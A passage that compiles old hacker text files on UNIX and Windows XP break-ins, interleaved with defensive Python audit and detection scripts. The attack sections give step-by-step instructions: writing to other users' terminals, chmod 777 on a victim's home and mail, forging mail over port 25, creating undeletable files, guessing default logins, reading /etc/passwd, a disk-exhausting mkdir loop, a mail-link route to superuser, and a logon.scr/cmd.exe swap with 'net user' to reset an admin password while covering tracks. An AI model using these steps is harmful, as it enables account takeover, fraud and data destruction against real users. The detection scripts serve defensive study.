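/var/run/utmp on current systems; both are tried.
"""
import struct
from datetime import datetime, timezone

# struct utmp (glibc, x86_64): little-endian, no alignment padding once
# the two-byte ut_pad after ut_type is written out explicitly.
UTMP_FORMAT = "<hhi32s4s32s256shhiii16s20s"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)   # 384
USER_PROCESS = 7                            # ut_type of an interactive login
DEAD_PROCESS = 8                            # ut_type left behind after logout

UTMP_PATHS = ("/var/run/utmp", "/etc/utmp")


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded char[] field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(data: bytes):
    """Yield one dict per record; a truncated trailing record is ignored."""
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        (ut_type, _pad, pid, line, _ut_id, user, host, _term, _exit,
         _session, tv_sec, _tv_usec, _addr, _unused) = struct.unpack_from(
            UTMP_FORMAT, data, off)
        yield {
            "type": ut_type,
            "pid": pid,
            "line": _cstr(line),
            "user": _cstr(user),
            "host": _cstr(host),
            "time": datetime.fromtimestamp(tv_sec, tz=timezone.utc),
        }


def logged_in(data: bytes):
    """Return (user, line, host, time) for live login sessions only."""
    return [(r["user"], r["line"], r["host"], r["time"])
            for r in parse_utmp(data) if r["type"] == USER_PROCESS]


def make_record(ut_type, pid, line, user, host, tv_sec) -> bytes:
    """Build one record; used here only to construct sample data."""
    return struct.pack(UTMP_FORMAT, ut_type, 0, pid, line.encode(), b"",
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0,
                       b"", b"")


# Constructed sample file: one live login plus one dead entry.
SAMPLE = (make_record(USER_PROCESS, 4242, "pts/0", "alice",
                      "192.0.2.10", 1700000000)
          + make_record(DEAD_PROCESS, 4243, "pts/1", "bob", "", 1700000100))

if __name__ == "__main__":
    data = SAMPLE
    for path in UTMP_PATHS:          # prefer the real file when readable
        try:
            with open(path, "rb") as fh:
                data = fh.read()
            break
        except OSError:
            continue
    for user, line, host, when in logged_in(data):
        print(f"{user:<12}{line:<10}{when:%Y-%m-%d %H:%M}  {host}")
```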

—————————————————————

When a user’s state field (see the -T flag option for the who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it.  These files can be found in the /dev
directory.  You can do anything to these files, so long as you
have access - e.g. you can read them, and write to them, but you
will notice that they never change in size.  They are called
character special files, and are really the link between the
system and the terminals.  Whatever you put in these files will
go straight to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
“mesg n” command is issued which turns off write access to that
terminal, BUT - if you can start cating to that terminal before the
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.

Check out the terminal, or terminal software being used.
Often you will be able to remotely program another user’s
terminal, simply by ‘cating’ a string to a user’s screen.  You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy (sometimes a
user will walk away without realizing that they are still
effectively logged on, leaving you with access to their
account!).  Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it!
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl-l), followed by “exit”
followed by a carriage return, followed by the transmit screen
code.  Using this technique you can wipe people’s directories or
anything.  My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc. at my own
leisure.

—————————————————————

If you ever briefly get access to another person’s account,
e.g. they leave the room to go to the toilet or whatever, then simply
type the following:

chmod 777 $HOME
chmod 777 $MAIL

Then clear the screen so they don’t see what you just typed.

Now you can go look at their directory, and their mail, and
you can even put mail in their mail file (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!

—————————————————————

Another way to send fake mail to people is to use the mail
server.  This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspicious when
they receive it, but it will fool the average user!

type telnet

the following prompt will appear:

telnet>

now type :

open localhost 25

some crap will come up about the mail server..now type:

mail from: xxxxxx     Put any name you want.

some more bullshit will come up. Now type:

rcpt to: xxxxxx  Put the name of the person to receive mail here.

now type:

data

now you can type the letter…end it with a “.”
type quit to exit once you are done.
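The text says mail typed straight into port 25 looks “slightly different to normal”. As an added example (not from the original text), here is the check a mail administrator can run to make that difference concrete: a hand-typed DATA section usually lacks the Date, From and Message-ID headers a real client adds, and the Received line shows a submission from localhost. Both sample messages are constructed; the header names and the localhost rule are assumptions about a typical server.

```python
"""Added example: flag mail that looks hand-injected at the SMTP port."""
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime

# Headers every mail client adds; a hand-typed DATA section usually lacks them.
REQUIRED_HEADERS = ("Date", "From", "Message-ID")


def forgery_indicators(raw: str):
    """Return reasons this message looks hand-injected (empty list if none)."""
    msg = message_from_string(raw)
    reasons = []
    for header in REQUIRED_HEADERS:
        if msg.get(header) is None:
            reasons.append(f"missing {header}")
    if msg.get("Date"):
        try:
            parsedate_to_datetime(msg["Date"])
        except (TypeError, ValueError):
            reasons.append("unparseable Date")
    _, addr = parseaddr(msg.get("From", ""))
    if msg.get("From") and "@" not in addr:
        reasons.append("From has no domain")
    # The procedure above connects to localhost 25, so the first Received
    # line the server stamps on names the local host as the submitter.
    received = msg.get_all("Received") or []
    if any("localhost" in r or "127.0.0.1" in r for r in received):
        reasons.append("submitted from localhost")
    return reasons


# Constructed sample: a message sent by a normal mail client.
NORMAL = """Received: from client.example.com (client.example.com [192.0.2.5])
\tby mail.example.com with ESMTP id 1; Tue, 14 Nov 2023 22:13:20 +0000
Date: Tue, 14 Nov 2023 22:13:20 +0000
From: Alice <alice@example.com>
To: bob@example.com
Message-ID: <20231114221320.1@client.example.com>
Subject: lunch

See you at noon.
"""

# Constructed sample: what the server stores after the telnet procedure
# above, where only a Subject line and the body were typed.
HAND_TYPED = """Received: from localhost (localhost [127.0.0.1])
\tby mail.example.com with SMTP id 2; Tue, 14 Nov 2023 22:15:00 +0000
Subject: urgent

Please reset your password at the link below.
"""

if __name__ == "__main__":
    for label, raw in (("normal", NORMAL), ("hand-typed", HAND_TYPED)):
        print(label, forgery_indicators(raw) or "clean")
```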

————————————————————-

Here’s one for any experimenters out there…
It is possible to create files which simply cannot be deleted
from the standard shell.  To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell.  Try things like Ctrl-h (this is the
code for the delete key).  Just a file with the name Ctrl-h would
not be deletable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back…..this is one of my
favourites..gets ’em every time!

The following script file is an example which will create a
file with the name Ctrl-h.  You MUST type this file in using the
vi editor or similar.
*****If you are not very good with vi, type “man vi” and print the
help file…it even contains stuff that I find useful now and
then.*****

type the following in vi…

echo "" > 'a^h'

***NOTE…to get the ^h (this really means ctrl-h) from vi type:

Ctrl v
Ctrl h

The Ctrl v instructs vi to take the next character as an ASCII
character, and not to interpret it.
Change the access on the file you just created and now
execute it.  It will create a file which looks like it is called
a, but try to delete it!..use wildcards if you really want to
delete it.
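The two tricks above leave traces a user or administrator can look for: a home directory or mail file left world-writable after chmod 777, and a file name hiding a control character such as Ctrl-h. As an added example (not from the original text), this Python audit walks a tree and reports both, and can clear the stray write bit; the sample tree it builds for its self-test is constructed, and the paths are assumptions.

```python
"""Added example: audit a directory tree for world-writable entries and
for names containing control characters (the chmod 777 and Ctrl-h tricks).
"""
import os
import stat
import tempfile


def visible(name: str) -> str:
    """Render control characters the way 'cat -v' does, e.g. Ctrl-h -> ^H."""
    out = []
    for ch in name:
        code = ord(ch)
        if code < 0x20:
            out.append("^" + chr(code + 0x40))
        elif code == 0x7F:
            out.append("^?")
        else:
            out.append(ch)
    return "".join(out)


def has_control_chars(name: str) -> bool:
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name)


def audit_tree(root: str):
    """Return a sorted list of (kind, path, detail) findings under root.

    kind is 'world-writable' (the o+w bit is set) or 'control-name' (the
    name contains a control character).  Symlinks are neither followed
    nor reported, so a dangling link cannot abort the scan.
    """
    findings = []
    entries = [root]                      # the tree root itself counts ($HOME)
    for dirpath, dirnames, filenames in os.walk(root):
        entries.extend(os.path.join(dirpath, n) for n in dirnames + filenames)
    for path in entries:
        name = os.path.basename(path)
        if has_control_chars(name):
            findings.append(("control-name", path, visible(name)))
        try:
            st = os.lstat(path)
        except OSError:
            continue
        if stat.S_ISLNK(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH:
            findings.append(("world-writable", path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)


def fix_world_writable(findings):
    """Clear the o+w bit on every world-writable finding; return paths fixed."""
    fixed = []
    for kind, path, _ in findings:
        if kind == "world-writable":
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            os.chmod(path, mode & ~stat.S_IWOTH)
            fixed.append(path)
    return fixed


def make_sample_tree() -> dict:
    """Constructed sample tree for a self-test; returns the paths created."""
    root = tempfile.mkdtemp(prefix="audit-")
    os.chmod(root, 0o700)
    sub = os.path.join(root, "sub")
    os.mkdir(sub)
    os.chmod(sub, 0o700)
    hidden = os.path.join(sub, "a\x08")   # shows up as plain 'a' in ls
    mbox = os.path.join(root, "mbox")     # the chmod 777 $MAIL case
    notes = os.path.join(root, "notes.txt")
    for path, mode in ((hidden, 0o600), (mbox, 0o666), (notes, 0o600)):
        open(path, "w").close()
        os.chmod(path, mode)
    return {"root": root, "hidden": hidden, "mbox": mbox, "notes": notes}


if __name__ == "__main__":
    for kind, path, detail in audit_tree(os.path.expanduser("~")):
        print(f"{kind:<15} {detail:<12} {visible(path)}")
```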

Title:   Tutorial on hacking through a UNIX system

In the following file, all references made to the name Unix may also be
taken to apply to the Xenix operating system.

Brief history:  Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously.  Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier.  After about 2 years of developmental research, they produced
an operating system they called “Unix”.
Sixties to Current:  During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient.  One of the systems they
put on the Unix system was called “Elmos”. Through Elmos many tasks (i.e.
billing, and installation records) could be done by many people using the same
mainframe.

Note: Cosmos is accessed through the Elmos system.

Current:  Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful).  Microsoft, seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT’s.  Their result they called
Xenix (pronounced zee-nicks).  Both Unix and Xenix can be easily installed
on IBM PC’s and offer the same function (just 2 different vendors).

Note: Due to the many different versions of Unix (Berkeley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.

How to tell if/if not you are on a Unix system:  Unix systems are quite
common systems across the country. Their security appears as such:

Login;     (or login;)
password:

When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lowercase. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson).  Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password
assigned by the sysop or chosen by the user.

Common default logins
————————–
login;       Password:
root         root,system,etc..
sys          sys,system
daemon       daemon
uucp         uucp
tty          tty
test         test
unix         unix
bin          bin
adm          adm
who          who
learn        learn
uuhost       uuhost
nuucp        nuucp

If you guess a login name and you are not asked for a password, and have
access to the system, then you have what is known as a non-gifted account.
If you guess a correct login and password, then you have a user account.
And, if you get the root p/w you have a “super-user” account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm. Once you are in the system, you will
get a prompt. Common prompts are:

$
%
#

But can be just about anything the sysop or user wants it to be.

Things to do when you are in: Some of the commands that you may want to
try follow below:

who is on  (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a      (list all files in current directory.)
du -a      (checks amount of memory your files use; disk usage)
cd\name    (name is the name of the sub-directory you choose)
cd\        (brings your home directory to current use)
cat name   (name is a filename, either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers’ environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts.
This can be done by doing the following command:

cat /etc/passwd

If you are successful you will see a list of all accounts on the system.  It
should look like this:
root:hvnsdcf:0:0:root dir:/:
joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe
hal::1:2:Hal Smith:/bin:/bin/hal

The “root” line tells the following info :
login name=root
hvnsdcf   = encrypted password
0         = user group number
0         = user number
root dir  = name of user
/         = root directory

In the Joe login, the last part “/bin/joe” tells us which directory
is his home directory. In the “hal” example the login name is
followed by 2 colons; that means that there is no password needed to get in
using his name.
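The passwd format just described is also what an administrator audits to catch exactly the weaknesses the tutorial hunts for. As an added example (not from the tutorial), this parser reads lines in the standard passwd(5) field order (name, password, UID, GID, GECOS, home, shell) and reports empty password fields, hashes readable from passwd, extra UID 0 accounts and shared UIDs; the sample reuses the three lines shown above.

```python
"""Added example: parse /etc/passwd lines and flag weak accounts."""
from typing import NamedTuple


class PasswdEntry(NamedTuple):
    name: str
    password: str      # "" means none required; "x", "*", "!" mean shadowed/locked
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


# The three sample lines shown in the tutorial above.
SAMPLE_PASSWD = """\
root:hvnsdcf:0:0:root dir:/:
joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe
hal::1:2:Hal Smith:/bin:/bin/hal
"""

SHADOW_MARKERS = ("x", "*", "!", "!!")


def malformed_lines(text: str):
    """Return 1-based numbers of non-blank lines that do not have 7 fields."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if line.strip() and not line.startswith("#")
            and len(line.split(":")) != 7]


def parse_passwd(text: str):
    """Yield a PasswdEntry per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        yield PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell)


def audit_passwd(text: str):
    """Return (account, problem) pairs for the conditions worth fixing."""
    problems = []
    seen_uids = {}
    for e in parse_passwd(text):
        if e.password == "":
            problems.append((e.name, "no password required"))
        elif e.password not in SHADOW_MARKERS:
            # Anyone who can read passwd can run a guessing attack offline.
            problems.append((e.name, "hash readable from passwd (no shadow file)"))
        if e.uid == 0 and e.name != "root":
            problems.append((e.name, "second superuser (UID 0)"))
        if e.uid in seen_uids:
            problems.append((e.name, f"shares UID {e.uid} with {seen_uids[e.uid]}"))
        else:
            seen_uids[e.uid] = e.name
    return problems


if __name__ == "__main__":
    for account, problem in audit_passwd(SAMPLE_PASSWD):
        print(f"{account:<10} {problem}")
```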

Conclusion:  I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.

On the Security of UNIX

=-=-=-=-=-=-=-=-=-=-=-=

Recently there has been much interest in the security aspects of operating systems and software. At issue is the ability to prevent undesired disclosure of information, destruction of information, and harm to the functioning of the system. This paper discusses the degree of security which can be provided under the system and offers a number of hints on how to improve security. The first fact to face is that UNIX was not developed with security, in any realistic sense, in mind; this fact alone guarantees a vast number of holes. (Actually the same statement can be made with respect to most systems.)

The area in which security is theoretically weakest is in protecting against crashing or at least crippling the operation of the system. The problem here is not mainly in uncritical acceptance of bad parameters to system calls (there may be bugs in this area, but none are known) but rather in lack of checks for excessive consumption of resources.

Most notably, there is no limit on the amount of disk storage used, either in total space allocated or in the number of files or directories. Here is a particularly ghastly shell sequence guaranteed to stop the system:

while : ; do
    mkdir x
    cd x
done

Either a panic will occur because all the i-nodes on the device are used up, or all the disk blocks will be consumed, thus preventing anyone from writing files on the device. In this version of the system, users are prevented from creating more than a set number of processes simultaneously, so unless users are in collusion it is unlikely that any one can stop the system altogether. However, creation of 20 or so CPU or disk-bound jobs leaves few resources available for others. Also, if many large jobs are run simultaneously, swap space may run out, causing a panic. It should be evident that excessive consumption of disk space, files, swap space and processes can easily occur accidentally in malfunctioning programs as well as at command level. In fact UNIX is essentially defenseless against this kind of abuse, nor is there any easy fix. The best that can be said is that it is generally fairly easy to detect what has happened when disaster strikes, to identify the user responsible, and take appropriate action. In practice, we have found that difficulties in this area are rather rare, but we have not been faced with malicious users, and enjoy a fairly generous supply of resources which have served to cushion us against accidental overconsumption.

The picture is considerably brighter in the area of protection of information from unauthorized perusal and destruction. Here the degree of security seems (almost) adequate theoretically, and the problems lie more in the necessity for care in the actual use of the system. Each UNIX file has associated with it eleven bits of protection information together with a user identification number and a user-group identification number (UID and GID).

Nine of the protection bits are used to specify independently permission to read, to write, and to execute the file to the user himself, to members of the user’s group, and to all other users. Each process generated by or for a user has associated with it an effective UID and a real UID, and an effective and real GID. When an attempt is made to access the file for reading, writing, or executing, the effective UID and GID of the process are used to decide permission. When a file with the set-UID bit set is executed, the effective UID for the process is changed to the UID associated with the file; the change persists until the process terminates or until the UID is changed again by another execution of a set-UID file. Similarly the effective group ID of a process is changed to the GID associated with a file when that file is executed and has the set-GID bit set. The real UID and GID of a process do not change when any file is executed, but only as the result of a privileged system call. The basic notion of the set-UID and set-GID bits is that one may write a program which is executable by others and which maintains files accessible to others only by that program.

The classical example is the game-playing program which maintains records of the scores of its players. The program itself has to read and write the score file, but no one but the game’s sponsor can be allowed unrestricted access to the file lest they manipulate the game to their own advantage.

The solution is to turn on the set-UID bit of the game program. When, and only when, it is invoked by players of the game, it may update the score file but ordinary programs executed by others cannot access the score. There are a number of special cases involved in determining access permissions. Since executing a directory as a program is a meaningless operation, the execute-permission bit, for directories, is taken instead to mean permission to search the directory for a given file during the scanning of a path name; thus if a directory has execute permission but no read permission for a given user, he may access files with known names in the directory, but may not read (list) the entire contents of the directory.

Write permission on a directory is interpreted to mean that the user may create and delete files in that directory; it is impossible for any user to write directly into any directory. Another, and from the point of view of security, much more serious special case is that there is a “super user” who is able to read any file and write any non-directory. The super-user is also able to change the protection mode and the owner UID and GID of any file and to invoke privileged system calls. It must be recognized that the mere notion of a super-user is a theoretical, and usually practical, blemish on any protection scheme.

The first necessity for a secure system is of course arranging that all files and directories have the proper protection modes. Traditionally, UNIX software has been exceedingly permissive in this regard; essentially all commands create files readable and writable by everyone. In the current version, this policy may be easily adjusted to suit the needs of the installation or the individual user. Associated with each process and its descendants is a mask, which is in effect anded with the mode of every file and directory created by that process. In this way, users can arrange that, by default, all their files are no more accessible than they wish. The standard mask, set by login, allows all permissions to the user himself and to his group, but disallows writing by others.

To maintain both data privacy and data integrity, it is necessary, and largely sufficient, to make one’s files inaccessible to others. The lack of sufficiency could follow from the existence of set-UID programs created by the user and the possibility of total breach of system security in one of the ways discussed below (or one of the ways not discussed below).

For greater protection, an encryption scheme is available. Since the editor is able to create encrypted documents, and the crypt command can be used to pipe such documents into the other text-processing programs, the length of time during which clear text versions need be available is strictly limited. The encryption scheme used is not one of the strongest known, but it is judged adequate, in the sense that cryptanalysis is likely to require considerably more effort than more direct methods of reading the encrypted files. For example, a user who stores data that he regards as truly secret should be aware that he is implicitly trusting the system administrator not to install a version of the crypt command that stores every typed password in a file. Needless to say, the system administrators must be at least as careful as their most demanding user to place the correct protection mode on the files under their control.

In particular, it is necessary that special files be protected from writing, and probably reading, by ordinary users when they store sensitive files belonging to other users. It is easy to write programs that examine and change files by accessing the device on which the files live.

On the issue of password security, UNIX is probably better than most systems. Passwords are stored in an encrypted form which, in the absence of serious attention from specialists in the field, appears reasonably secure, provided its limitations are understood. In the current version, it is based on a slightly defective version of the Federal DES; it is purposely defective so that easily-available hardware is useless for attempts at exhaustive key-search. Since both the encryption algorithm and the encrypted passwords are available, exhaustive enumeration of potential passwords is still feasible up to a point. We have observed that users choose passwords that are easy to guess: they are short, or from a limited alphabet, or in a dictionary. Passwords should be at least six characters long and randomly chosen from an alphabet which includes digits and special characters.
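The paper names three weaknesses (short, limited alphabet, in a dictionary) and a minimum policy. As an added example (not from the paper), this checker applies exactly those criteria to a candidate and estimates the exhaustive-search space the paper says remains feasible "up to a point"; the word list is a constructed stand-in for a real dictionary file.

```python
"""Added example: check a password against the paper's three weaknesses."""
import math
import string

MIN_LENGTH = 6                       # the paper's minimum
ALPHABET_CLASSES = {
    "lower": set(string.ascii_lowercase),
    "upper": set(string.ascii_uppercase),
    "digit": set(string.digits),
    "special": set(string.punctuation),
}
# Constructed sample; stands in for /usr/share/dict/words or a breach list.
SAMPLE_WORDLIST = {"password", "secret", "letmein", "unix", "welcome"}


def classes_used(password: str):
    """Which character classes actually occur in the password."""
    return {name for name, chars in ALPHABET_CLASSES.items()
            if any(c in chars for c in password)}


def keyspace_bits(password: str) -> float:
    """log2 of the space an exhaustive search of this length and alphabet covers."""
    size = sum(len(ALPHABET_CLASSES[c]) for c in classes_used(password))
    return len(password) * math.log2(size) if size else 0.0


def weaknesses(password: str, wordlist=SAMPLE_WORDLIST):
    """Return the subset of {'short', 'limited-alphabet', 'dictionary'} that applies."""
    found = set()
    if len(password) < MIN_LENGTH:
        found.add("short")
    used = classes_used(password)
    # The paper asks for an alphabet that includes digits and special characters.
    if "digit" not in used or "special" not in used:
        found.add("limited-alphabet")
    # Dictionary check ignores case and a trailing run of digits ('unix99').
    core = password.lower().rstrip(string.digits)
    if core in wordlist or password.lower() in wordlist:
        found.add("dictionary")
    return found


def acceptable(password: str, wordlist=SAMPLE_WORDLIST) -> bool:
    return not weaknesses(password, wordlist)


if __name__ == "__main__":
    for candidate in ("unix", "unix99", "Password1", "k7#Qz9p!"):
        print(f"{candidate:<12} {keyspace_bits(candidate):5.1f} bits "
              f"{sorted(weaknesses(candidate)) or 'ok'}")
```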

Of course there also exist feasible non-cryptanalytic ways of finding out passwords. For example: write a program which types out “login:” on the typewriter and copies whatever is typed to a file of your own. Then invoke the command and go away until the victim arrives.

The set-UID (set-GID) notion must be used carefully if any security is to be maintained. The first thing to keep in mind is that a writable set-UID file can have another program copied onto it.
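Two passages above are easiest to follow as arithmetic on the mode bits: the per-process mask that is "in effect anded with the mode" of every new file, and the writable set-UID file that lets anyone copy another program onto it. As an added example (not from the paper), this Python module applies a mask to a requested mode, renders the eleven protection bits the way ls does, and flags the dangerous combination; the sample modes are constructed.

```python
"""Added example: umask arithmetic, mode rendering and the writable
set-UID check from the paper, on constructed modes."""
import stat

# Masks the paper describes.  "All permissions to the user himself and to
# his group, but disallows writing by others" is a mask of 002.
LOGIN_MASK = 0o002
PRIVATE_MASK = 0o077      # nothing at all for group or others


def apply_umask(requested: int, mask: int) -> int:
    """Mode a new file actually gets: requested AND NOT mask, as the kernel does."""
    return requested & ~mask & 0o7777


def describe(mode: int) -> str:
    """'rwsr-xr-x'-style string: nine rwx bits plus set-UID/set-GID."""
    bits = [
        (stat.S_IRUSR, "r"), (stat.S_IWUSR, "w"), (stat.S_IXUSR, "x"),
        (stat.S_IRGRP, "r"), (stat.S_IWGRP, "w"), (stat.S_IXGRP, "x"),
        (stat.S_IROTH, "r"), (stat.S_IWOTH, "w"), (stat.S_IXOTH, "x"),
    ]
    out = [ch if mode & bit else "-" for bit, ch in bits]
    if mode & stat.S_ISUID:               # 's' over an x, 'S' when not executable
        out[2] = "s" if out[2] == "x" else "S"
    if mode & stat.S_ISGID:
        out[5] = "s" if out[5] == "x" else "S"
    return "".join(out)


def dangerous_setuid(mode: int) -> bool:
    """True when a set-UID or set-GID file is writable by group or others.

    Such a file can have another program copied onto it and then run with
    the owner's privileges, the case the paper warns about.
    """
    privileged = mode & (stat.S_ISUID | stat.S_ISGID)
    writable_by_others = mode & (stat.S_IWGRP | stat.S_IWOTH)
    return bool(privileged and writable_by_others)


def audit_modes(path_mode_pairs):
    """Return the paths whose (name, mode) pairs are dangerous set-UID files."""
    return [path for path, mode in path_mode_pairs if dangerous_setuid(mode)]


if __name__ == "__main__":
    # Constructed examples, not real files.
    for name, mode in (("game", 0o4755), ("broken-suid", 0o4777)):
        print(f"{describe(mode)}  {name}  dangerous={dangerous_setuid(mode)}")
    print(describe(apply_umask(0o666, LOGIN_MASK)), "from 666 under the login mask")
```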

For example, if the super-user command is writable, anyone can copy the shell onto it and get a password-free version of Shell Unix. A more subtle problem can come from set-UID programs which are not sufficiently careful of what is fed into them. To take an obsolete example, the previous version of the mail command was set-UID and owned by the super-user. This version sent mail to the recipient’s own directory. The notion was that one should be able to send mail to anyone even if they want to protect their directories from writing. The trouble was that mail was rather dumb: anyone could mail someone else’s private file to himself. Much more serious is the following scenario: make a file with a line like one in the password file which allows one to log in as the super-user. Then make a link named “.mail” to the password file in some writable directory on the same device as the password file (say /tmp). Finally mail the bogus login line to /tmp/.mail; you can then login as the superuser, clean up the incriminating evidence, and have your will.

The fact that users can mount their own disks and tapes as file systems can be another way of gaining super-user status. Once a disk pack is mounted, the system believes what is on it. Thus one can take a blank disk pack, put on it anything desired, and mount it. There are obvious and unfortunate consequences. For example: a mounted disk with garbage on it will crash the system; one of the files on the mounted disk can easily be a password-free version of Shell Unix; other files can be unprotected entries for special files. The only easy fix for this problem is to forbid the use of mount to unprivileged users. A partial solution, not so restrictive, would be to have the mount command examine the special file for bad data, set-UID programs owned by others, and accessible special files, and balk at unprivileged invokers.

How to hack Windows XP Admin Passwords (the easy way)


This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time you’re
asked to put in your username and up to five others.
Now, unbeknownst to a lot of other people, this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to bypass most administrator accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Windows XP Home and Pro.
—————————————————————————–
Now this one seems to be machine dependent, it works randomly (don’t know why)

If you log into a limited account on your target machine and open up a DOS prompt
then enter this set of commands exactly:
(this appeared on http://www.astalavista.com a few days ago but I found that it wouldn’t work
on the welcome screen of a normally booted machine)
—————————————————————————–
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
—————————————————————————–
Now what you have just done is told the computer to back up the command program
and the screen saver file, then edit the settings so when the machine boots the
screen saver you will get an unprotected DOS prompt without logging into XP.
Once this happens, enter this command minus the quotes:
“net user <admin account name here> password”
If the Administrator Account is called SAMAD and you want the password blah, enter this:
“net user SAMAD blah”
and this changes the password on SAMAD’s machine to blah and you’re in.

Have fun
p.s: don’t forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either
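The screen-saver swap above leaves a recognisable state on disk: cmd.exe gone from system32, logon.scr byte-identical to a cmd.exe copy, and (unless cleaned up) a leftover temphack directory. As an added example (not from the original post), this check looks for those three signs in any directory you point it at; the default path and the temphack name are taken from the post, and the directories used in the self-test are constructed.

```python
"""Added example: detect the logon.scr / cmd.exe swap described in the post."""
import hashlib
import os
import tempfile

SYSTEM32 = r"C:\Windows\System32"   # default; pass another directory to override
BACKUP_DIR = "temphack"              # the directory name the post uses


def sha256_of(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def screensaver_swap_indicators(system32: str = SYSTEM32):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    scr = os.path.join(system32, "logon.scr")
    cmd = os.path.join(system32, "cmd.exe")
    backup = os.path.join(system32, BACKUP_DIR)
    if not os.path.isfile(cmd):
        findings.append("cmd.exe is missing from system32")
    if not os.path.isfile(scr):
        findings.append("logon.scr is missing from system32")
    if os.path.isdir(backup):
        findings.append(f"leftover backup directory {BACKUP_DIR}")
    # Compare the screen saver against every cmd.exe copy we can find.
    if os.path.isfile(scr):
        scr_hash = sha256_of(scr)
        for candidate in (cmd, os.path.join(backup, "cmd.exe")):
            if os.path.isfile(candidate) and sha256_of(candidate) == scr_hash:
                findings.append(f"logon.scr is byte-identical to {candidate}")
    return findings


def make_sample_system32(swapped: bool) -> str:
    """Constructed directory mimicking a clean or a tampered system32."""
    root = tempfile.mkdtemp(prefix="sys32-")
    cmd_bytes, scr_bytes = b"MZ\x90\x00fake-cmd", b"MZ\x90\x00fake-scr"
    if not swapped:
        files = {"cmd.exe": cmd_bytes, "logon.scr": scr_bytes}
    else:  # exactly the state the post's command sequence leaves behind
        os.mkdir(os.path.join(root, BACKUP_DIR))
        files = {"logon.scr": cmd_bytes,
                 os.path.join(BACKUP_DIR, "cmd.exe"): cmd_bytes,
                 os.path.join(BACKUP_DIR, "logon.scr"): scr_bytes}
    for name, data in files.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    print(screensaver_swap_indicators() or "no indicators found")
```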